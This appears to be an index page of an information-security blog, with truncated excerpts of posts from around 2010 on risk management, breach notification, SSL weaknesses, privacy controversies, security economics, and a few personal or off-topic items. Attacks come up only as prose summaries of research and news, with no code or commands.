James Reason’s entire career was full of mistakes. Most of them were other people’s. And while we all feel that way, in his case, it was really true. As a professor of psychology, he made a career of studying human errors and how to prevent them. He has a list of awards that’s a full […]

 

6502 Visual Simulator

In 6502 visual simulator, Bunnie Huang writes: It makes my head spin to think that the CPU from the first real computer I used, the Apple II, is now simulateable at the mask level as a browser plug-in. Nothing to install, and it’s Open-licensed. How far we have come…a little more than a decade ago, […]

 
 

Fair Warning: I haven't read this report, but…

@pogowasright pointed to “HOW many patient privacy breaches per month?:” As regular readers know, I tend to avoid blogging about commercial products and am leery about reporting results from studies that might be self-serving, but a new paper from FairWarning has some data that I think are worth mentioning here. In their report, they provide […]

 

Fake voting cards in Afghanistan?

NPR is talking about fraudulent ID cards and people voting multiple times. What happened to the purple ink solution? How did we end up exporting bad thinking about security to Afghanistan?

 
 

Use crypto. Not too confusing. Mostly asymmetric.

A little ways back, Gunnar Peterson said “passwords are like hamburgers, taste great but kill us in long run wean off password now or colonoscopy later.” I responded: “Use crypto. Not too confusing. Mostly asymmetric.” I’d like to expand on that a little. Not quite so much as Michael Pollan, but a little. The first […]

 

Don't fight the zeitgeist, CRISC Edition

Some guy recently posted a strangely self-defeating link/troll/flame in an attempt to (I think) argue with Alex and/or myself regarding the relevance or lack thereof of ISACA’s CRISC certification.  Now given that I think he might have been doing it to drive traffic to his CRISC training site, I won’t show him any link love […]

 

Dear CloudTards: "Securing" The Cloud isn't the problem…

@GeorgeResse pointed out this article http://www.infoworld.com/d/cloud-computing/five-facts-every-cloud-computing-pro-should-know-174 from @DavidLinthicum today.  And from a Cloud advocate point of view I like four of the assertions.  But his point about Cloud Security is off: “While many are pushing back on cloud computing due to security concerns, cloud computing is, in fact, as safe as or better than most […]

 

Michael Healey: Pay Attention (Piling On)

Richard Bejtlich has a post responding to an InformationWeek article written by Michael Healey, ostensibly about end user security.  Richard  upbraids Michael for writing the following: Too many IT teams think of security as their trump card to stop any discussion of emerging tech deemed too risky… Are we really less secure than we were […]

 

Friday WTF?

CSO Online has an article based on an unlinked Forrester study that claims: The survey of 2,803 IT decision-makers worldwide found improving business continuity and disaster recovery capabilities is the number one priority for small and medium businesses and the second highest priority for enterprises. (emphasis mine). The WTF Pie Chart Says:

 

Dear AT&T

You never cease to amaze me with your specialness. You’ve defined a way to send MMS on a network you own, with message content you control, and there’s no way to see the full message: In particular, I can’t see the password that I need to see the message.

 

SOIRA Presentation/Meeting TOMORROW, 10:30 EST!

Hey everyone! Pete Lindstrom will be giving us his “Risk 2.0” presentation tomorrow via webex at 10:30 EST. I’ve seen the deck, and it will be a great preso. Topic: Risk Analysis Date: Thursday, September 9, 2010 Time: 10:30 am, Eastern Daylight Time (New York, GMT-04:00) Meeting Number: 748 861 569 Meeting Password: risk?whatrisk? ——————————————————- […]

 

Data breach fines will prolong the rot

The UK’s Financial Services Authority has imposed a £2.28 million fine for losing a disk containing the information about 46,000 customers. (Who was fined is besides the point here.) I agree heartily with John Dunn’s “Data breach fines will not stop the rot,” but I’d like to go further: Data breach fines will prolong the […]

 

The lumbering ogre of Enterprise Governance is no replacement for real Quality Management.

Gideon Rasmussen, CISSP, CISA, CISM, CIPP, writes in his latest blog post (http://www.gideonrasmussen.com/article-22.html) about the BP Oil spill and operational risk, and the damages the spill is causing BP.  Ignoring the hindsight bias of the article here… “This oil spill is a classic example of a black swan (events with the potential for severe impact […]

 

Saturday Corn Baking

Well, following on Arthur’s post on baking bread, I wanted to follow up with “how to bake corn:” Please go read “Baked Buttered Corn” A way to bring some happiness to the end of summer is to take this corn and simply bake it with butter. It’s fabulous. The starchy corn juices create a virtual […]

 

Friday Bread Baking

A few folks have asked, so here’s my general bread recipe in bakers percentages. In bakers percentages everything is based on a ratio compared to the weight of the flour. The formula for my bread is: 100% Whole wheat flour (I’m a geek, I grind my own) 72% Water (or whey) 2% Salt 1% Yeast […]

 

Petroski on Engineering

As I was reading the (very enjoyable) “To Engineer is Human,” I was struck by this quote, in which Petroski first quotes Victorian-era engineer Robert Stephenson, and then comments: …he hoped that all the casualties and accidents, which had occurred during their progress, would be noticed in revising the Paper; for nothing was so instructive […]

 

Quantum Crypto is Quantum Backdoored, But It's Not a Problem

Nature reports that Quantum Cryptography has been completely broken in “Hackers blind quantum cryptographers.” Researcher Vadim Makarov of the Norwegian University of Science and Technology constructed an attack on a quantum cryptography system that “gave 100% knowledge of the key, with zero disturbance to the system,” as Makarov put it. There have been other attacks […]

 

OSF looking for DataLossDB help

The folks running the Open Security Foundation’s DataLossDB are asking for some fully tax-deuctible help meeting expenses. I’ve blogged repeatedly about the value of this work, and hope that interested EC readers can assist in supporting it. With new FOIA-able sources of information becoming available, now seems to be a great time to help out.

 

Transparency, India, Voting Machines

India’s EVMs are Vulnerable to Fraud. And for pointing that out, Hari Prasad has been arrested by the police in India, who wanted to threaten and intimidate him question him about where he got the machine that he studied. That’s a shame. The correct response is to fund Hari Prasad’s work, not use the police […]

 

Wikileaks

Friday night an arrest warrant went out, and was then rescinded, for Wikileaks founder Julian Assange. He commented “We were warned to expect “dirty tricks”. Now we have the first one.” Even the New York Times was forced to call it “strange.” I think that was the wrong warning. Wikileaks is poking at a very […]

 

Measurement Theory & Risk Posts You Should Read

These came across the SIRA mailing list. They were so good, I had to share: https://eight2late.wordpress.com/2009/07/01/cox%E2%80%99s-risk-matrix-theorem-and-its-implications-for-project-risk-management/ http://eight2late.wordpress.com/2009/12/18/visualising-content-and-context-using-issue-maps-an-example-based-on-a-discussion-of-coxs-risk-matrix-theorem/ http://eight2late.wordpress.com/2009/10/06/on-the-limitations-of-scoring-methods-for-risk-analysis/ Thanks to Kevin Riggins for finding them and pointing them out.

 

P != NP and Security

There’s been a lot of discussion about the paper written by mathematician Vinay Deolalikar on this interesting problem. The P!=NP problem is so interesting that there’s a million-dollar prize for solving it. It might even be interesting because there’s a million-dollar prize for solving it. It might also have some applicability to computer science and […]

 

Databases or Arrests?

From Dan Froomkin, “FBI Lab’s Forensic Testing Backlog Traced To Controversial DNA Database,” we see this example of the mis-direction of key funds: The pressure to feed results into a controversial, expansive DNA database has bogged down the FBI’s DNA lab so badly that there is now a two-year-and-growing backlog for forensic DNA testing needed […]

 

How not to address child ID theft

(San Diego, CA) Since the 1980?s, children in the US have been issued Social Security numbers (SSN) at birth. However, by law, they cannot be offered credit until they reach the age of 18. A child?s SSN is therefore dormant for credit purposes for 18 years. Opportunists have found novel ways to abuse these “dormant” […]

 

Dating and InfoSec

So if you don’t follow the folks over at OKCupid, you are missing out on some hot data. In case you’re not aware of it, OKCupid is: the best dating site on earth. Compiling our observations and statistics from the hundreds of millions of user interactions we’ve logged, we use this outlet to explore the […]

 

Bleg: Picture editor?

I used to use “Galerie” on my Mac to put nice pretty frames around pictures I posted here. (See some examples.) Galerie was dependent on … blah, blah, won’t work anymore without some components no longer installed by default. So I’m looking for a replacement that will, with little effort, put pictures in a nice […]

 

Making it up so you don't have to

If you don’t have time to develop a data-driven, business focused security strategy, we sympathize. It’s a lot of hard work. So here to help you is “What the fuck is my information security ‘strategy?’ “: Thanks, N!

 

Jon Callas on Comedies, Tragedy and PKI

Prompted by Peter Gutmann: [0] I’ve never understood why this is a comedy of errors, it seems more like a tragedy of errors to me. Jon Callas of PGP fame wrote the following for the cryptography mail list, which I’m posting in full with his permission: That is because a tragedy involves someone dying. Strictly […]

 

New low in pie charts

It’s not just a 3d pie chart with lighting effects and reflection. Those are common. This one has been squished. It’s wider than it is tall. While I’m looking closely, isn’t “input validation” a superset of “buffer errors” “code injection” and “command injection?” You can get the “Application Security Trends report for Q1-Q2 2010” from […]

 

Transparent Lies about Body Scanners

In “Feds Save Thousands of Body Scan Images,” EPIC reports: In an open government lawsuit against the United States Marshals Service, EPIC has obtained more than one hundred images of undressed individuals entering federal courthouses. The images, which are routinely captured by the federal agency, prove that body scanning devices store and record images of […]

 

Illogical Cloud Positivism

Last we learned, Peter Coffee was Director of Platform Research for salesforce.com.  He also blogs on their corporate weblog, CloudBlog, a blog that promises “Insights on the Future of Cloud Computing”. He has a post up from last week that called “Private Clouds, Flat Earths, and Unicorns” within which he tries to “bust some myths” […]

 

What They Know (From the WSJ)

Interesting interactive data app from the Wall Street Journal about your privacy online and what various websites track/know about you. http://blogs.wsj.com/wtk/ Full disclosure, our site uses Mint for traffic analytics.

 

Black Hat Slides

My talk at Black Hat this year was “Elevation of Privilege, the Easy Way to Get Started Threat Modeling.” I covered the game, why it works and where games work. The link will take you to the PPTX deck.

 

Credit Scores and Deceptive Advertising

Frank Pasquale follows a Joe Nocera article on credit scores with a great roundup of issues that the credit system imposes on American citizens, including arbitrariness, discriminatory effects and self-fulfilling prophecies. His article is worth a look even if you think you understand credit scores. I’d like to add one more danger of credit scores: […]

 
 

Cisco's Artichoke of Attack

Cisco has their security report up – find it here.  My favorite part?  “The Artichoke of Attack”

 

SOUPS Keynote & Slides

This week, the annual Symposium on Usable Privacy and Security (SOUPS) is being held on the Microsoft campus. I delivered a keynote, entitled “Engineers Are People Too:” In “Engineers Are People, Too” Adam Shostack will address an often invisible link in the chain between research on usable security and privacy and delivering that usability: the […]

 

Society of Information Risk Analysts Webex/Meeting Tomorrow

Hey, just so you all know, SOIRA is having our lunch (or breakfast) Al-Desko Webex.  This month we have the pleasure of watching Chris Hayes show how to use quantitative risk analysis for real, pragmatic business purposes.  It’s going to be seriously useful. Join SOIRA here:  http://groups.google.com/group/InfoRiskSociety?hl=en for the invite.

 

Survey Results

First, thanks to everyone who took the unscientific, perhaps poorly worded survey. I appreciate you taking time to help out.  I especially appreciate the feedback from the person who took the time to write in: “Learn the proper definition of “Control Systems” as in, Distributed Control Systems or Industrial Control systems. These are the places […]

 

A Blizzard of Real Privacy Stories

Over the last week, there’s been a set of entertaining stories around Blizzard’s World of Warcraft games and forums. First, “World of Warcraft maker to end anonymous forum logins,” in a bid to make the forums less vitriolic: Mr Brand said that one Blizzard employee posted his real name on the forums, saying that there […]

 

Risk -> Operational Security Survey

Hi, I’m very interested right now in finding the quality of risk analysis as it relates to operational security. If you’re a risk analyst, a security executive, or operational security analyst, would you mind taking a one question survey? It’s on SurveyMonkey, here: http://www.surveymonkey.com/s/GCSXZ2Q”

 
 

The Next Unexpected Failure of Government

In looking at Frank Pasquale’s very interesting blog post “Secrecy & the Spill,” a phrase jumped out at me: I have tried to give the Obama Administration the benefit of the doubt during the Gulf/BP oil disaster. There was a “grand ole party” at Interior for at least eight years. Many Republicans in Congress would […]

 

GAO report on the state of Federal Cyber Security R&D

This GAO Report is a good overall summary of the state of Federal cyber security R&D and why it’s not getting more traction.    Their recommendations (p22) aren’t earth-shaking: “…we are recommending that the Director of the Office of Science and Technology Policy, in conjunction with the national Cybersecurity Coordinator, direct the Subcommittee on Networking and […]

 

In Congress Assembled, July 4, 1776

In CONGRESS, July 4, 1776 The unanimous Declaration of the thirteen united States of America, When in the Course of human events, it becomes necessary for one people to dissolve the political bands which have connected them with another, and to assume among the powers of the earth, the separate and equal station to which […]

 

ISACA CRISC – A Faith-Based Initiative? Or, I Didn't Expect The Spanish Inquisition

In comments to my “Why I Don’t Like CRISC” article, Oliver writes: CobIT allows to segregate what is called IT in analysable parts.  Different Risk models apply to those parts. e.g. Information Security, Architecture, Project management. In certain areas the risk models are more mature (Infosec / Project Management) and in certain they are not […]

 

Thinking about Cloud Security & Vulnerability Research: Three True Outcomes

When opining on security in “the cloud” we, as an industry, speak very much in terms of real and imagined threat actions.  And that’s a good thing: trying to anticipate security issues is a natural, prudent task. In Lori McVittie’s blog article, “Risk is not a Synonym for “Lack of Security”, she brings up an […]

 
 

RiskIT – Does ISACA Suffer From Dunning-Kruger?

Just to pile on a bit…. You ever hear someone say something, and all of the sudden you realize that you’ve been trying to say exactly that, in exactly that manner, but hadn’t been so succinct or elegant at it?  That someone much smarter than you had already thought about the subject a whole lot […]

 

CRISC? C-Whatever

Alex’s posts on Posts on CRISC are, according to Google, is more authoritative than the CRISC site itself: Not that it matters.  CRISC is proving itself irrelevant by failing to make anyone care.  By way of comparison, I googled a few other certifications for the audit and security world, then threw in the Certified Public […]

 

CRISC -O

PREFACE:  You might interpret this blog post as being negative about risk management here, dear readers.  Don’t. This isn’t a diatrabe against IRM, only why “certification” around information risk is a really, really silly idea. Apparently, my blog about why I don’t like the idea of CRISC has long-term stickiness.  Just today, Philip writes in […]

 

Between an Apple and a Hard Place

So the news is all over the web about Apple changing their privacy policy. For example, Consumerist says “Apple Knows Where Your Phone Is And Is Telling People:” Apple updated its privacy policy today, with an important, and dare we say creepy new paragraph about location information. If you agree to the changes, (which you […]

 

Bleh, Disclosure

Lurnene Grenier has a post up on the Google/Microsoft vunlerability disclosure topic. I commented on the SourceFire blog (couldn’t get the reminder from Zdnet about my password, and frankly I’m kind of surprised I already had an account – so I didn’t post there), but thought it was worth discussing my comments here a bit […]

 

Measuring The Speed of Light Using Your Microwave

Using a dish full of marshmallows.  We’re doing this with my oldest kids, and while I was reading up on it, I had to laugh out loud at the following: …now you have what you need to measure the speed of light. You just need to know a very fundamental equation of physics: Speed of […]

 

Alex on Science and Risk Management

Alex Hutton has an excellent post on his work blog: Jim Tiller of British Telecom has published a blog post called “Risk Appetite, Counting Security Calories Won’t Help”. I’d like to discuss Jim’s blog post because I think it shows a difference in perspectives between our organizations. I’d also like to counter a few of […]

 

High Impact Work

Perry Metzger recently drew this to my attention: The title of my talk is, “You and Your Research.” It is not about managing research, it is about how you individually do your research. I could give a talk on the other subject – but it’s not, it’s about you. I’m not talking about ordinary run-of-the-mill […]

 

On Politics

In “Jon Stewart on Obama’s executive power record” Glenn Greenwald writes: When ACLU Executive Director Anthony Romero last week addressed the progressive conference America’s Future Now, he began by saying: “I’m going to start provocatively . . . I’m disgusted with this president.” Last night, after Obama’s Oval Office speech, Jon Stewart began his show […]

 

Bleg: How to Delete Kindle Logs?

Well, Amazon has a new update for Kindle (with folders! OMG!), and I’m planning to apply it. However, last time I installed an update, I noticed that it lost the “wireless off” setting, and was apparently contacting Amazon. I don’t want it to do so, and leave wireless off. It’s safer that way, whatever promises […]

 

Breach Laws & Norms in the UK & Ireland

Ireland has proposed a new Data Breach Code of Practice, and Brian Honan provides useful analysis: The proposed code strives to reach a balance whereby organisations that have taken appropriate measures to protect sensitive data, e.g. encryption etc., need not notify anybody about the breach, nor if the breach affects non-sensitive personal data or small […]

 

Redesign BP's Logo

I like this one a lot. Go vote for your favorite at BP Logo Redesign contest.

 

Mobile Money for Haiti: a contest

This is cool: The Bill & Melinda Gates Foundation is using its financial clout to push the Haitian marketplace toward change by offering $10 million in prizes to the first companies to help Haitians send and receive money with their cell phones… The fund will offer cash awards to companies that initiate mobile financial services […]

 

Excellent Post On Maturity Scale for Log Management

http://raffy.ch/blog/2010/06/07/maturity-scale-for-log-management-and-analysis/ Raffael Marty’s great  post on how to measure the maturity level for your log management program.   Excellent as always.

 

Lady Ada books opening May 11

Ada’s Technical Books is Seattle’s only technical book store located in the Capitol Hill neighborhood of Seattle, Washington. Ada’s specifically carries new, used, & rare books on Computers, Electronics, Physics, Math, and Science as well as hand-picked inspirational and leisure reading, puzzles, brain teasers, and gadgets geared toward the technically minded customer. From the store’s […]

 

Thanks!

Andrew and I want to say thank you to Dave Marsh. His review of our book includes this: I’d have to say that the first few pages of this book had more of an impact on me that the sum of all the pages of any other security-related book I had ever read It’s really […]

 

Decision Making Not Analysis Paralysis

There’s been a lot of pushback against using Risk Management in Information Security because we don’t have enough information to make a good decision. Yet every security professional makes decisions despite a lack of information. If we didn’t we’d never get anything done. Hell we’d never get out of bed in the morning. There’s a […]

 

Facebook Links

Some worthwhile reads on Facebook and privacy: Facebook’s Privacy Reboot: Is That all You’ve Got for Us? “The devil is in the defaults” Entire Facebook Staff Laughs As Man Tightens Privacy Settings

 

30 vs 150,000

For your consideration, two articles in today’s New York Times. First, “How to Remind a Parent of the Baby in the Car?:” INFANTS or young children left inside a vehicle can die of hyperthermia in a few hours, even when the temperature outside is not especially hot. It is a tragedy that kills about 30 […]

 

B-Sides Las Vegas Call For Papers

Friend of the blog and TV’s own <grin> Chris Nickerson has firmed up B-Sides for Las Vegas and is looking for a few good people to submit a few good presos. I spoke last year with David Mortman and it was awesome.  Chris put on some real good event/space for us all. I encourage you […]

 

ANNOUNCEMENT: The Society of Information Risk Analysts

I was talking with (the now nationally famous) Rich Mogull at Secure360 last week in St. Paul (fabulous security gathering, btw, I highly recommend it), and he reiterated his position that we had too much “echo chamber” and not enough engagement with everyone – especially our peers who are down in the trenches and too […]

 

Life

Today will be remembered along with the landing on the moon and the creation of the internet: Researchers at the J. Craig Venter Institute (JCVI), a not-for-profit genomic research organization, published results today describing the successful construction of the first self-replicating, synthetic bacterial cell. The team synthesized the 1.08 million base pair chromosome of a […]

 

We'll always have Facebook…

Waitress Is Fired for Her Complaint on Facebook: Lesson Learned for Employers?. From [German Consumer Protection] Minister Aigner to Mark Zuckerberg: the importance of privacy Farewell, Facebook “Why one super-connected internet enthusiast decided it was time to pull the plug” 5 WTFs: I quit Facebook Today Quit Facebook Day versus 10 Reasons You’ll Never Quit […]

 

This is what science is for

In “The Quest for French Fry Supremacy 2: Blanching Armageddon,” Dave Arnold of the French Culinary Institute writes: Blanching fries does a lot for you – such as: killing the enzymes that make the potatoes turn purpley-brown. Blanching is always necessary if the potatoes will be air-dried before frying. gelatinizing the starch. During frying, pre-cooked […]

 

Where's the Checks and Balances, Mr. Cameron?

[Update: See Barry’s comments, I seem to misunderstand the proposal.] The New York Times headlines “ Britain’s New Leaders Aim to Set Parliament Term at 5 Years.” Unlike the US, where we have an executive branch of government, the UK’s executive is the Prime Minister, selected by and from Parliament. As I understand things, the […]

 

Malware reports? (A bleg)

I’m doing some work that involves seeing what people are saying about the state of malware in 2010, and search terms like “malware report” get a lot of results, they don’t always help me find thinks like the Symantec ISTR, the McAfee threats report or the Microsoft SIR. To date, I’ve found reports from Cisco, […]

 

Welcome to the club!

As EC readers may know, I’ve been sort of a collector of breach notices, and an enthusiastic supporter of the Open Security Foundation’s DataLossDB project. Recently, I had an opportunity to further support DataLossDB, by making an additional contribution to their Primary Sources archive – a resource I find particularly valuable. Unfortunately, that contribution was […]

 

Facebook Privacy

If you haven’t seen http://mattmckeon.com/facebook-privacy/‘s graphic of how Facebook’s default privacy settings have evolved, it’s worth a look:

 

Getting the time dimension right

If you are developing or using security metrics, it’s inevitable that you’ll have to deal with the dimension of time. “Data” tells you about the past. “Security” is a judgement about the present. “Risk” is a cost of the future, brought to the present. The way to marry these three is through social learning processes.

 

Word!

We show that malicious TeX, BibTeX, and METAPOST files can lead to arbitrary code execution, viral infection, denial of service, and data exfiltration, through the file I/O capabilities exposed by TeX’s Turing-complete macro language. This calls into doubt the conventional wisdom view that text-only data formats that do not access the network are likely safe. […]

 

Taxman

Let me tell you how it will be There’s one for you, nineteen for me Chorus: If privacy appear too small Be grateful I don’t take it all Thanks to Jim Harper for the link.

 

"Cyber Economic Incentives" is one of three themes at Federal Cybersecurity R&D Kickoff Event

This event will be the first discussion of these Federal cybersecurity R&D objectives and will provide insights into the priorities that are shaping the direction of Federal research activities. One of the three themes is “Cyber economic incentives — foundations for cyber security markets, to establish meaningful metrics, and to promote economically sound secure practices.”

 

Because Money Is Liberty Coined

I really love these redesigns of the US Dollar: There’s a contest, and I like these designs by Michael Tyznik the most. On a graphical level, they look like money. He’s integrated micro-printing, aligned printing (that $5 in the upper left corner, it’s really hard to print so it works when you look at light) […]

 

A personal announcement

I will be entering the PhD program in Computational Social Science (with certificates in InfoSec and Economic Systems Design) at George Mason University, Fairfax VA, starting in the Fall of 2010.

 

It's Hard to Nudge

There’s a notion that government can ‘nudge’ people to do the right thing. Big examples include letting people opt-out of organ donorship, rather than opting in (rates of organ donorship go from 10-20% to 80-90%, which is pretty clearly a better thing than putting those organs in the ground or crematoria). Another classic example was […]

 

Earth, from the surface of Mars

This is the first image ever taken of Earth from the surface of a planet beyond the Moon. It was taken by the Mars Exploration Rover Spirit one hour before sunrise on the 63rd Martian day, or sol, of its mission. (March 8, 2004) Credit: NASA Goadard’s flickr stream.

 

How to Get Started In Information Security, the New School Way

There have been a spate of articles lately with titles like “The First Steps to a Career in Information Security” and “How young upstarts can get their big security break in 6 steps.” Now, neither Bill Brenner nor Marisa Fagan are dumb, but both of their articles miss the very first step. And it’s important […]

 

Lies, Damned Lies and Inappropriate Baselines

Thomas Ricks wrote a blog on Foreign Policy titled “Another reason to support Obamacare.” In it, he cited a Stars & Stripes report that one of out five veterans under the age of 24 is out of work. However, Stars and Stripes compares total unemployment to 18-24 male vet unemployment. It took me less than […]

 

The Liquids ban is a worse idea than you thought

According to new research at Duke University, identifying an easy-to-spot prohibited item such as a water bottle may hinder the discovery of other, harder-to-spot items in the same scan. Missing items in a complex visual search is not a new idea: in the medical field, it has been known since the 1960s that radiologists tend […]

 

Failure to Notify Leads to Liability in Germany

…a Bad Homburg business man won millions in damages in a suit against the [Liechtenstein] bank for failing to reveal that his information was stolen along with hundreds of other account holders and sold to German authorities for a criminal investigation. He argued that if the bank had informed those on the list that their […]

 

Evil Clown Stalking for your Birthday?

Dominic Deville stalks young victims for a week, sending chilling texts, making prank phone calls and setting traps in letterboxes. He posts notes warning children they are being watched, telling them they will be attacked. But Deville is not an escaped lunatic or some demonic monster. He is a birthday treat, hired by mum and […]

 

Parkour Generations Video

I could pretend to tie this to information security, talking about risk and information sharing, but really, it’s just beautiful to watch these folks learn to play:

 

Source, Data or Methodology: Pick at least one

In the “things you don’t want said of your work” department, Ars Technica finds these gems in a GAO report: This estimate was contained in a 2002 FBI press release, but FBI officials told us that it has no record of source data or methodology for generating the estimate and that it cannot be corroborated…when […]

 

J.C. Penny knew best

JC Penney, Wet Seal: Gonzalez Mystery Merchants JCPenney and Wet Seal were both officially added to the list of retail victims of Albert Gonzalez on Friday (March 26) when U.S. District Court Judge Douglas P. Woodlock refused to continue their cloak of secrecy and removed the seal from their names. StorefrontBacktalk had reported last August […]

 
 

Friday Visualization: Wal-mart edition

I’ve seen some cool Walmart visualizations before, and this one at FlowingData is no exception. The one thing I wondered about as I watched was if it captured store closings–despite the seemingly inevitable march in the visualization, there have been more than a few.

 

Elsewhere…

Things are busy and chaotic, but while I’m unable to blog, here’s some audio and video I’ve done recently that you might enjoy: “Meeting of the Minds” with Andy Jaquith and myself in either text or audio. Face-Off with Hugh Thompson “Has social networking changed data privacy forever?” Video

 

On Uncertain Security

One of the reasons I like climate studies is because the world of the climate scientist is not dissimilar to ours.  Their data is frought with uncertainty, it has gaps, and it might be kind of important (regardless of your stance of anthropomorphic global warming, I think we can all agree that when the climate […]

 

Makeup Patterns to hide from face detection

Adam Harvey is investigating responses to the growing ubiquity of surveillance cameras with facial recognition capabilities. He writes: My thesis at ITP, is to research and develop privacy enhancing counter technology. The aim of my thesis is not to aid criminals, but since artists sometimes look like criminals and vice versa, it is important to […]

 
 

Cyberdeterrence Papers

This just came past my inbox: The National Research Council (NRC) is undertaking a project entitled “Deterring Cyberattacks: Informing Strategies and Developing Options for U.S. Policy.” The project is aimed at fostering a broad, multidisciplinary examination of strategies for deterring cyberattacks on the United States and the possible utility of these strategies for the U.S. […]

 

Life without Certificate Authorities

Since it seems like I spent all of last week pronouncing that ZOMG!  SSL and Certificate Authorities is Teh Doomed!, I guess that this week I should consider the alternatives.  Fortunately, the Tor Project Blog, we learn what life is like without CA’s Browse to a secure website, like https://torproject.org/. You should get the intentionally […]

 

Going Dutch: Time for a Breach Notification Law

The European Digital Rights Initiative mentions that “Bits of Freedom starts campaign for data breach notification law:” A data breach notification obligation on telecom providers is already to be implemented on the basis of the ePrivacy Directive, but Bits of Freedom insisted that this obligation should be extended also to other corporations and organisations. It […]

 

Your RIVACY is important to us

…so important that we didn’t even proofread our rivacy policy. I’m hopeful that they apply more due care to how they administer their policy, but fear it’s like a dirty restaurant bathroom. If they don’t bother to take care of what the public sees, what are they doing in the kitchen? From “Commercial Terms of […]

 

More Bad News for SSL

I haven’t read the paper yet, but Schneier has a post up which points to a paper “Side-Channel Leaks in Web Applications: a Reality Today, a Challenge Tomorrow,” by Shuo Chen, Rui Wang, XiaoFeng Wang, and Kehuan Zhang.about a new side-channel attack which allows an eavesdropper to infer information about the contents of an SSL […]

 

Smoke, Fire and SSL

Where there’s smoke, there’s fire, goes the adage. And in the case of an allegedly-theoretical exploit outlined in a new paper by Chris Soghoian and Sid Stamm (the compelled certificate creation attack), the presence of a product whose only use it to exploit it probably indicates that there’s more going on than one would like […]

 

Well that didn't take long…

The Guardian has reported the first official incident of misuse of full-body scanner information The police have issued a warning for harassment against an airport worker after he allegedly took a photo of a female colleague as she went through a full-body scanner at Heathrow airport. The incident, which occurred at terminal 5 on 10 […]

 

The New School on Lady Ada Day

Today is Ada Lovelace Day, an international day of blogging to celebrate the achievements of women in technology and science. For Lady Ada Day, Andrew and I want to thank Jessica Goldstein, our editor at Addison Wesley. Without her encouragement, feedback and championing, we never would have published the New School. The first proposal we […]

 

Risks Interconnection Map

The sweet interactive version is here: http://www.weforum.org/documents/riskbrowser2010/risks/# Beyond the cool visualization, I’m really interested in the likelihood/impact of data fraud/data loss over on the left there…

 

Women In Security

Today is Ada Lovelace Day, an international day of blogging to celebrate the achievements of women in technology and science. For Lady Ada Day, I wanted to call out the inspiring work of Aleecia McDonald. In a privacy world full of platonic talk of the value of notice and consent, Aleecia did something very simple: […]

 

Counterpoint: There is demand for security innovation

Over in the Securosis blog, Rich Mogull wrote a post “There is No Market for Security Innovation.” Rich is right that there’s currently no market, but that doesn’t mean there’s no demand. I think there are a couple of inhibitors to the market, but the key one is that transaction costs are kept high by […]

 

I look forward to merging your unique visibility into my own

In “White House Cyber Czar: ‘There Is No Cyberwar’,” Ryan Singel writes: As for his priorities, Schmidt says education, information sharing and better defense systems rank high. That includes efforts to train more security professionals and have the government share more information with the private sector — including the NSA’s defensive side. “One thing we […]

 

Some Chaotic Thoughts on Healthcare

Passage of this bill is too big for my little brain, and therefore I’ll share some small comments. I’m going to leave out the many anecdotes which orient me around stupid red tape conflicts in the US, how much better my health care was in Canada (and how some Canadian friends flew to the US […]

 

Lessons from Robert Maley's Dismissal

A bit over a week ago, it came out that “Pennsylvania fires CISO over RSA talk.” Yesterday Jaikumar Vijayan continued his coverage with an interview, “Fired CISO says his comments never put Penn.’s data at risk.” Now, before I get into the lessons here, I want to point out that Maley is the sort of […]

 

Kids today

A burglar who spent about five hours on a store’s computer after breaking into the business gave police all the clues they needed to track him down. Investigators said the 17-year-old logged into his MySpace account while at Bella Office Furniture and that made it easy for them to find him. He also spent time […]

 
 

Why I'm Skeptical of "Due Diligence" Based Security

Some time back, a friend of mine said “Alex, I like the concept of Risk Management, but it’s a little like the United Nations – Good in concept, horrible in execution”. Recently, a couple of folks have been talking about how security should just be a “diligence” function, that is, we should just prove that […]

 

National Broadband Plan & Data Sharing

I know that reading the new 376 page US “National Broadband Plan” is high on all your priority lists, but section 14 actually has some interestingly New School bits. In particular: Recommendation 14.9: The Executive Branch, in collaboration with relevant regulatory authorities, should develop machine-readable repositories of actionable real-time information concerning cybersecurity threats in a […]

 

'Experts' misfire in trying to shoot down Charney's 'Internet Security Tax' idea

Industry ‘experts’ misfired when they criticized Microsoft’s Scott Chareney’s “Internet Security Tax” idea. Q: How many of these ‘experts’ know any thing about information economics and public policy responses to negative externalities? A: Zero. Thus, they aren’t really qualified to comment. This is just one small case in the on-going public policy discussions regarding economics of information security, but given the reaction of the ‘experts’, this was a step backward.

 

Asking the right questions

Schneier points me to lightbluetouchpaper, who note a paper analyzing the potential strength of name-based account security questions, even ignoring research-based attacks, and the findings are good: Analysing our data for security, though, shows that essentially all human-generated names provide poor resistance to guessing. For an attacker looking to make three guesses per personal knowledge […]

 

Your credit worthiness in 140 Characters or Less

In “Social networking: Your key to easy credit?,” Eric Sandberg writes: In their quest to identify creditworthy customers, some are tapping into the information you and your friends reveal in the virtual stratosphere. Before calling the privacy police, though, understand how it’s really being used. … To be clear, creditors aren’t accessing the credit reports […]

 

Elsewhere in the New School department

Dennis Fisher wrote “Why Bob Maley’s Firing is Bad for All of Us:” The news that Pennsylvania CISO Bob Maley lost his job for publicly discussing a security incident at last week’s RSA Conference really shouldn’t come as a surprise, but it does. Even for a government agency, this kind of lack of understanding of […]

 

Head of O'Hare Security says it sucks

In the eight months that I was the head of security under the Andolino administration, the commissioner of the busiest airport of the world, depending on who’s taking the survey, the busiest airport in the world, never once had a meeting with the head of security for the busiest airport in the world. Never once. […]

 

Data void: False Positives

A Gartner blog post points out the lack of data reported by vendors or customers regarding the false positive rates for anti-spam solutions. This is part of a general problem in the security industry that is a major obstical to rational analysis of effectiveness, cost-effectiveness, risk, and the rest

 

Everybody Should Be Doing Something about InfoSec Research

Previously, Russell wrote “Everybody complains about lack of information security research, but nobody does anything about it.” In that post, he argues for a model where Ideally, this program should be “idea capitalists”, knowing some people and ideas won’t payoff but others will be huge winners. One thing for sure — we shouldn’t focus this […]

 

Krebs on Cyber vs Physical Crooks

In addition, while traditional bank robbers are limited to the amount of money they can physically carry from the scene of the crime, cyber thieves have a seemingly limitless supply of accomplices to help them haul the loot, by hiring so-called money mules to carry the cash for them. I can’t help but notice one […]

 

Everybody complains about lack of information security research, but nobody does anything about it

There has been a disconnect between the primary research sectors and a lack of appropriate funding in each is leading to decreased technological progress, exposing a huge gap in security that is happily being exploited by cybercriminals. No one seems to be able to mobilize any signficant research into breakthrough cyber security solutions. It’s been very frustrating to see so much talk and so little action. This post proposes one possible solution: Information Security Pioneers Fellowship Program (ISPFP), similar to Gene Spafford’s proposal for a Information Security and Privacy Extended Grant (ISPEG) for academic researchers.

 

Free speech for police

